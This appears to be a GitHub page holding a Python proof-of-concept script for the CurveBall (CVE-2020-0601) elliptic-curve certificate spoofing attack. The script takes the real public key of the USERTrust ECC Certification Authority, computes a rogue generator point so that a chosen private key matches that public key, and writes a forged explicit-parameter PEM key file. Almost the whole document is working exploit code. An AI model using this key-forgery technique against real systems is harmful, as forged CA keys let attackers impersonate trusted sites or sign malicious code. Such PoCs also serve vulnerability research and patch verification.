Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
2 contributors

Users who have contributed to this file

@sylvainpelissier @AnomalRoil
53 lines (46 sloc) 1.73 KB
from fastecdsa.curve import P384
from fastecdsa.point import Point
from Crypto.Util.asn1 import DerSequence, DerOctetString, DerBitString
from binascii import unhexlify, hexlify
import gmpy2
from Crypto.IO import PEM
# USERTrust ECC Certification Authority public key
pubkey = b"1aac545aa9f96823e77ad5246f53c65ad84babc6d5b6d1e67371aedd9cd60c61fddba08903b80514ec57ceee5d3fe221b3cef7d48a79e0a3837e2d97d061c4f199dc259163ab7f30a3b470e2c7a1339cf3bf2e5c53b15fb37d327f8a34e37979"
Q = Point(int(pubkey[0:96],16), int(pubkey[96:],16), curve=P384)
# Generate rogue generator
privkey_inv = 2
# we take the private key as being the inverse of 2 modulo the curve order
privkey = gmpy2.invert(privkey_inv,P384.q)
privkey = unhexlify(f'{privkey:x}'.encode())
# we multply our public key Q with the inverse of our chosen private key value
rogueG = privkey_inv * Q
rogueG = unhexlify(b"04" + f'{rogueG.x:x}'.encode() + f'{rogueG.y:x}'.encode())
# Generate the file with explicit parameters
f = open('p384-key.pem','rt')
keyfile = PEM.decode(f.read())
#print(hexlify(keyfile[0]))
f.close()
seq_der = DerSequence()
der = seq_der.decode(keyfile[0])
# Replace private key
octet_der = DerOctetString(privkey)
der[1] = octet_der.encode()
# Replace public key
#print(hexlify(der[3]))
bits_der = DerBitString(unhexlify(b"04" + pubkey))
der[3] = b"\xa1\x64" + bits_der.encode()
#print(hexlify(der[3]))
# Replace the generator
#print(hexlify(der[2]))
seq_der = DerSequence()
s = seq_der.decode(der[2][4:])
octet_der = DerOctetString(rogueG)
s[3] = octet_der.encode()
der[2] = der[2][:4] + s.encode()
#print(hexlify(der[2]))
# Generate new file
f = open('p384-key-rogue.pem','w')
#print(hexlify(der.encode()))
keyfile = PEM.encode(der.encode(), 'EC PRIVATE KEY')
f.write(keyfile)
f.close()
You can’t perform that action at this time.